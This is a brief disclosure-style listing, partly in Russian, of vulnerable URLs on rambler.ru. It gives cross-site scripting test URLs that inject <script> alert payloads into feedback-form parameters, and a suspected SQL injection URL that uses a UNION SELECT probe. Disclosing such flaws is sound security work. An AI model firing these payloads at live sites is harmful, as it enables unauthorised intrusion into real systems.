CSS:
http://www.rambler.ru/db/support/feedback.shtml?name=<script>javascript:alert('hello')</script>
http://www.rambler.ru/db/support/feedback.shtml?subj=<script>javascript:alert('hello')</script>
http://www.rambler.ru/db/support/feedback.shtml?message=<script>javascript:alert('helo')</script>
Подозрение на SQL - Injection:
http://cards.rambler.ru/show_big.html?id=5191&s=46%20UNION%20SELECT%20null/*
http://www.rambler.ru/db/finance/othernews.html?src=117